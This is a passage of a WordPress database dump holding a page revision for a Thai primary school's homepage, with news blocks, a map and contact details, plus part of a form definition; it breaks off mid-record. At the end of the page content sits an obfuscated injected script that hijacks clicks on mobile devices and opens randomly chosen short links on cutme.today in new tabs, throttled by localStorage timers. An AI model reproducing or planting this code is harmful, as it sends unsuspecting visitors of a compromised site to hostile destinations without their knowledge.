900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-03 21:52:03','2024-08-03 14:52:03','',14,'http://pakhaeng.ssk.in.th/?p=516',0,'revision','',0),
(517,1,'2024-08-03 21:59:35','2024-08-03 14:59:35','{\"fields\":{\"2\":{\"id\":\"2\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"simple\",\"description\":\"\\u0e01\\u0e23\\u0e38\\u0e13\\u0e32\\u0e01\\u0e23\\u0e2d\\u0e01 \\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e43\\u0e2b\\u0e49\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"3\":{\"id\":\"3\",\"type\":\"textarea\",\"label\":\"\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"css\":\"\"},\"4\":{\"id\":\"4\",\"type\":\"number\",\"label\":\"\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c (\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49)\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : 08x-xxx-xxxx\",\"required\":\"1\",\"size\":\"medium\",\"placeholder\":\"\",\"default_value\":\"\",\"css\":\"\"},\"5\":{\"id\":\"5\",\"type\":\"email\",\"label\":\"Email\",\"description\":\"\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 : xxx@email.com\",\"size\":\"medium\",\"placeholder\":\"\",\"confirmation_placeholder\":\"\",\"default_value\":false,\"filter_type\":\"\",\"allowlist\":\"\",\"denylist\":\"\",\"css\":\"\"},\"6\":{\"id\":\"6\",\"type\":\"name\",\"label\":\"\\u0e0a\\u0e37\\u0e48\\u0e2d-\\u0e19\\u0e32\\u0e21\\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e16\\u0e39\\u0e01\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"format\":\"simple\",\"description\":\"\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e0a\\u0e37\\u0e48\\u0e2d - \\u0e2a\\u0e01\\u0e38\\u0e25 \\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e23\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"7\":{\"id\":\"7\",\"type\":\"select\",\"label\":\"\\u0e15\\u0e33\\u0e41\\u0e2b\\u0e19\\u0e48\\u0e07\",\"choices\":{\"1\":{\"default\":\"1\",\"label\":\"\\u0e1c\\u0e39\\u0e49\\u0e2d\\u0e33\\u0e19\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e42\\u0e23\\u0e07\\u0